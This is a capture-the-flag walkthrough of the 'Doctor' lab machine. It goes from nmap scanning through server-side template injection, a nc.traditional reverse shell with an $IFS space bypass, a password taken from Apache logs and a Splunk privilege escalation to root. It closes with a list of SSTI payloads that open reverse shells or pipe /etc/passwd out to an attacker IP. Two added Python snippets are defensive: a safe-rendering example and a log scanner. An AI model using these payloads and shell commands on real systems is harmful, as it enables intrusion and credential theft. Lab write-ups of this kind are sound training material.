NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-27 20:49 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:49
Completed NSE at 20:49, 0.00s elapsed
Initiating NSE at 20:49
Completed NSE at 20:49, 0.00s elapsed
Initiating NSE at 20:49
Completed NSE at 20:49, 0.00s elapsed
Initiating Ping Scan at 20:49
Scanning 10.10.10.209 [4 ports]
Completed Ping Scan at 20:49, 0.30s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 20:49
Scanning doctors.htb (10.10.10.209) [1000 ports]
Discovered open port 22/tcp on 10.10.10.209
Discovered open port 80/tcp on 10.10.10.209
Discovered open port 8089/tcp on 10.10.10.209
Completed SYN Stealth Scan at 20:50, 16.75s elapsed (1000 total ports)
Initiating Service scan at 20:50
Scanning 3 services on doctors.htb (10.10.10.209)
Completed Service scan at 20:50, 37.92s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against doctors.htb (10.10.10.209)
Retrying OS detection (try #2) against doctors.htb (10.10.10.209)
Initiating Traceroute at 20:51
Completed Traceroute at 20:51, 0.38s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:51
Completed Parallel DNS resolution of 2 hosts. at 20:51, 0.23s elapsed
NSE: Script scanning 10.10.10.209.
Initiating NSE at 20:51
Completed NSE at 20:51, 12.07s elapsed
Initiating NSE at 20:51
Completed NSE at 20:51, 2.48s elapsed
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Nmap scan report for doctors.htb (10.10.10.209)
Host is up (0.31s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: HEAD GET OPTIONS
| http-server-header:
|   Apache/2.4.41 (Ubuntu)
|_  Werkzeug/1.0.1 Python/3.8.2
| http-title: Doctor Secure Messaging - Login
|_Requested resource was http://doctors.htb/login?next=%2F
8089/tcp open  ssl/http Splunkd httpd
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-06T15:57:27
| Not valid after:  2023-09-06T15:57:27
| MD5:   db23 4e5c 546d 8895 0f5f 8f42 5e90 6787
|_SHA-1: 7ec9 1bb7 343f f7f6 bdd7 d015 d720 6f6f 19e2 098b
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.32 - 3.1 (86%), Linux 2.6.39 - 3.2 (86%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 16.009 days (since Fri Sep 11 20:37:56 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   372.46 ms 10.10.14.1
2   371.49 ms doctors.htb (10.10.10.209)

NSE: Script Post-scanning.
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.94 seconds
           Raw packets sent: 2089 (95.608KB) | Rcvd: 46 (2.824KB)
PORT 80
Port 80 by itself gives us nothing to check, so let's go further: add doctors.htb to our hosts file and see what the vhost serves.
Here we have a login page. Now let's look at port 8089.
PORT 8089
Here we have the standard Splunkd web interface, and we have no login credentials for it yet.
Now let's enumerate the login page of doctors.htb.
Here we have nothing except the contact address info@doctors.htb.
Now let's create a user and log in to the website.
Now log in.
We only see a new-message area, so let's check that.
As seen above, whatever we post is rendered back on the page.
We could also try Vulners, but it won't work here. Messaging apps that reflect user input are prone to XSS, SSTI and similar bugs; since there's no XSS here, let's check for SSTI.
Here we enter the basic test payload (a template expression that evaluates 7*7) to check for SSTI.
To find the test payload you can use this link:
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
If we get 49 back, SSTI is confirmed.
But where do we check the output? It isn't rendered on this page.
If you look at the page source, there's another path, /archive.
In the source of /archive we get 49 back.
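Why the 49 shows up at all: the app splices user text into the template source, so the engine parses whatever we typed as template syntax. The nmap output shows Werkzeug/Python, which usually means Flask with Jinja2. The following is an added example, not part of this walkthrough and not the box's application code; it uses Python's standard-library string.Template as a stand-in for Jinja2 so it runs without any extra packages (the injection marker is $name here rather than {{ }}, but the mechanism is identical). SERVER_CONTEXT, PAGE_TEMPLATE, render_unsafe, render_safe and looks_like_template_probe are names made up for the example, and the token value is a constructed sample.

```python
"""Added example: why user text inside a template *source* becomes code.

Uses only the standard library (string.Template instead of Jinja2) so it runs
anywhere; the mechanism is the same, only the placeholder syntax differs
($name here, {{ name }} in Jinja2).
"""
import html
import re
from string import Template

# Server-side data the template may reference.  Constructed sample values,
# not anything from the box.
SERVER_CONTEXT = {
    "site_name": "Doctor Secure Messaging",
    "admin_token": "CONSTRUCTED-SAMPLE-TOKEN",
}

# Hypothetical page template: the message is a placeholder, i.e. data.
PAGE_TEMPLATE = Template("<h1>$site_name</h1>\n<p>$message</p>")

# Delimiters of common template engines: Jinja2/Twig ({{ }}, {% %}),
# string.Template/FreeMarker ($x, ${x}), ERB (<% %>), Thymeleaf/Ruby (#{ }).
TEMPLATE_SYNTAX = re.compile(
    r"\{\{.*?\}\}|\{%.*?%\}|\$\{.*?\}|\$[A-Za-z_]\w*|<%.*?%>|#\{.*?\}", re.S
)


def render_unsafe(message: str, context: dict = SERVER_CONTEXT) -> str:
    """Vulnerable pattern: the message is concatenated into the template source,
    so a $placeholder typed by the user is resolved against the server context
    exactly like the developer's own placeholders (the SSTI root cause)."""
    template = Template("<h1>$site_name</h1>\n<p>" + message + "</p>")
    return template.safe_substitute(context)


def render_safe(message: str, context: dict = SERVER_CONTEXT) -> str:
    """Fixed pattern: the template source is a constant and the message is
    passed in as data (and HTML-escaped), so it is never parsed for syntax."""
    return PAGE_TEMPLATE.safe_substitute(context, message=html.escape(message))


def looks_like_template_probe(message: str) -> bool:
    """Cheap detection hook: flag submissions that contain template delimiters
    (e.g. the {{7*7}} arithmetic canary, ${...}, {% %}) for review."""
    return TEMPLATE_SYNTAX.search(message) is not None


if __name__ == "__main__":
    probe = "hello $admin_token"
    print("unsafe :", render_unsafe(probe))   # server token leaks into the page
    print("safe   :", render_safe(probe))     # placeholder stays literal text
    print("probe? :", looks_like_template_probe(probe))
```

The fix is not input filtering: render_safe works because the template string is a compile-time constant and the message only ever travels through the substitution mapping. looks_like_template_probe is a monitoring aid (log and alert on probes), not a substitute for that fix.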
Now let's use payloads from the link above to get a shell.
First, let's try whether this basic command (a curl back to our listener) works:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/doctor]
└──╼ #nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.219] from (UNKNOWN) [10.10.10.209] 52932
GET / HTTP/1.1
Host: 10.10.14.219
User-Agent: curl/7.68.0
Accept: */*
Let's embed the basic command 'id' in it.
┌─[root@liquid]─[~/Desktop/HTB/doctor]
└──╼ #nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.219] from (UNKNOWN) [10.10.10.209] 52960
GET /uid=1001(web) HTTP/1.1
Host: 10.10.14.219
User-Agent: curl/7.68.0
Accept: */*
The output shows we're running as the web user; now let's get a shell this way.
Spaces aren't allowed in the command used for the shell, so to bypass that we use the shell variable $IFS (the internal field separator, which expands to space, tab and newline) in their place.
Plain nc still won't work here, so, following a nudge from the HTB forum, we use nc.traditional instead.
The whole command looks like this:
curl http://10.10.14.XXX/$('nc.traditional'$IFS'10.10.14.XXX'$IFS'9004'$IFS'-e/bin/sh')
┌─[✗]─[root@liquid]─[~/Desktop/HTB/doctor]
└──╼ #nc -lnvp 9004
listening on [any] 9004 ...
connect to [10.10.14.219] from (UNKNOWN) [10.10.10.209] 46942
id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)
python3 -c 'import pty;pty.spawn("/bin/bash")'
web@doctor:~$
Here we go, we have our shell.
Now we need access as user shaun for the user flag.
Let's download linpeas onto the box and run it.
LINPEAS.sh
web@doctor:/tmp$ wget http://10.10.14.219/linpeas.sh
wget http://10.10.14.219/linpeas.sh
--2020-09-27 19:40:59--  http://10.10.14.219/linpeas.sh
Connecting to 10.10.14.219:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 161297 (158K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh          100%[===================>] 157,52K  34,1KB/s    in 4,6s

2020-09-27 19:41:05 (34,1 KB/s) - ‘linpeas.sh’ saved [161297/161297]

web@doctor:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
web@doctor:/tmp$ ./linpeas.sh
Among the log files, linpeas turns up a password:
[+] Finding passwords inside logs (limit 70)
Binary file /var/log/apache2/access.log.11.gz matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/system.journal matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/user-1001.journal matches
Binary file /var/log/kern.log.2.gz matches
Binary file /var/log/kern.log.4.gz matches
Binary file /var/log/syslog.3.gz matches
/var/log/apache2/access.log:10.10.14.165 - - [27/Sep/2020:18:25:24 +0200] "GET /reset_password HTTP/1.1" 200 1814 "-" "gobuster/3.0.1"
/var/log/apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
/var/log/auth.log.1:Sep 22 13:01:23 doctor sshd[1704]: Failed <---------------->
POST /reset_password?email=Guitar123
Use this password to switch to user shaun.
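From the defender's side, the interesting part of that linpeas hit is not the password itself but how it got there: a credential was sent in the query string of a request to /reset_password, so Apache wrote it to the access log (and to the "backup" copy), where any account that can read the logs picks it up. The scanner below is an added example, not part of this walkthrough or the box: it parses Apache combined-format lines and flags (a) any request to an authentication endpoint that carries parameters in the URL, reporting parameter names but never values, and (b) well-known enumeration-tool user agents such as the gobuster one in the same log. The first two sample lines are the ones from the linpeas output above; the other two are constructed benign traffic. AUTH_PATHS, SCANNER_UAS, Finding, parse_line and scan_access_log are names chosen for the example.

```python
"""Added example: spot credentials leaking into Apache access logs.

Parses combined-format lines and reports two things the walkthrough's log
excerpt exhibits: parameters in the URL of an authentication endpoint (which
get logged, as the reset-password one did) and directory-brute-force tooling.
"""
import re
from dataclasses import dataclass
from urllib.parse import parse_qsl, urlsplit

# Combined log format; protocol, referer and user agent are optional because
# the walkthrough's /var/log/apache2/backup line has no protocol or UA field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
    r'(?: "(?P<referer>[^"]*)")?(?: "(?P<ua>[^"]*)")?'
)

# Endpoints that receive secrets; secrets belong in the POST body, never in
# the URL, because the URL is written to access logs, proxies and history.
AUTH_PATHS = ("/login", "/reset_password", "/register")

# Substrings of user agents set by common enumeration tools.
SCANNER_UAS = ("gobuster", "dirb", "ffuf", "wfuzz", "nikto", "sqlmap")

# First two lines are from the linpeas output in the walkthrough; the last two
# are constructed benign traffic (TEST-NET address, made-up UA).
SAMPLE_LOG = [
    '10.10.14.165 - - [27/Sep/2020:18:25:24 +0200] "GET /reset_password HTTP/1.1" 200 1814 "-" "gobuster/3.0.1"',
    '10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"',
    '192.0.2.10 - - [27/Sep/2020:18:30:01 +0200] "GET /static/main.css HTTP/1.1" 200 512 "http://doctors.htb/login" "Mozilla/5.0 (constructed)"',
    '192.0.2.10 - - [27/Sep/2020:18:30:05 +0200] "POST /login HTTP/1.1" 302 0 "http://doctors.htb/login" "Mozilla/5.0 (constructed)"',
]


@dataclass
class Finding:
    rule: str
    ip: str
    detail: str


def parse_line(line: str):
    """Return the fields of one access-log line, or None if it doesn't parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["params"] = parse_qsl(url.query, keep_blank_values=True)
    return rec


def scan_access_log(lines):
    """Apply both rules to every line; parameter *names* are reported, never
    values, so the alert itself does not re-leak the secret."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"].rstrip("/") in AUTH_PATHS and rec["params"]:
            names = ", ".join(name for name, _ in rec["params"])
            findings.append(Finding(
                "credential-in-query", rec["ip"],
                f'{rec["method"]} {rec["path"]} carries [{names}] in the URL'))
        ua = (rec["ua"] or "").lower()
        if any(tool in ua for tool in SCANNER_UAS):
            findings.append(Finding("scanner-user-agent", rec["ip"], rec["ua"]))
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.rule:22} {f.ip:14} {f.detail}")
```

Run against a real log with scan_access_log(open("/var/log/apache2/access.log")). The durable fix belongs in the application (accept the reset email in the request body) and in log hygiene (restrict read access to /var/log/apache2 and don't leave world-readable "backup" copies); the rule only tells you when that has already gone wrong.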
USER ACCESS
web@doctor:/tmp$ su shaun
su shaun
Password: Guitar123
shaun@doctor:/tmp$ cd
cd
shaun@doctor:~$ cat user.txt
cat user.txt
c75e402f70f60093xxxxxxxxxxxxxx
shaun@doctor:~$
There's the user flag.
Now, running pspy64 shows that Splunk is running as root.
There's a Git repo with an exploit for that.
We just need to transfer the script to the machine and run it.
But before running it, you'll notice some base64-encoded text in these lines:
-H $'Host: 127.0.0.1:8089' -H $'Connection: close' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: */*' -H $'User-Agent: python-requests/2.18.4' -H $'Content-Length: 60' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Authorization: Basic c2hhdW46R3VpdGFyMTIz' \
YWRtaW46Y2hhbmdlbWUK >> admin:changeme
These are Splunk's default credentials, which won't work here because they've been changed, so base64-encode shaun's credentials instead:
shaun:Guitar123 >> c2hhdW46R3VpdGFyMTIz
Replace the value with that and run the exploit again.
ROOT ACCESS
shaun@doctor:/tmp$ chmod +x splunk.sh
chmod +x splunk.sh
shaun@doctor:/tmp$ ./splunk.sh
./splunk.sh
[!] SPLUNK LOCAL PRIVESC [!]
<----------------------->
[!] If all went well run /tmp/.tester/bin/shdoor -p for a root shell
[!] Run whoami if your prompt didn't change...
[!] DELETE THE .tester DIRECTORY AS ROOT WHEN YOU'RE DONE! [!]
shaun@doctor:/tmp$ /tmp/.tester/bin/shdoor -p
/tmp/.tester/bin/shdoor -p
# is
is
/tmp/.tester/bin/shdoor: 1: is: not found
# id
id
uid=1002(shaun) gid=1002(shaun) euid=0(root) groups=1002(shaun)
# cd /root
cd /root
# cat root.txt
cat root.txt
2f72635dd8e28780xxxxxxxxxxxxxxxxxx
#
There's the root flag!
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
Note: some other SSTI payloads to try:
${import os;os.popen("whoami").read() }
${{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{%import socket,subprocess,os%}{{s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.219",9004));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'}}
<script>document.location=http://10.10.14.219:9004; echo "hi" | /bin/nc.traditional 10.10.14.219 9004 -e / bin / bash#'
{% if request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('cat /etc/passwd | nc 10.10.14.219 9004')['read']() == 'chiv' %} a {% endif %}
They won't work here, but they will work on other SSTI targets (different template engines).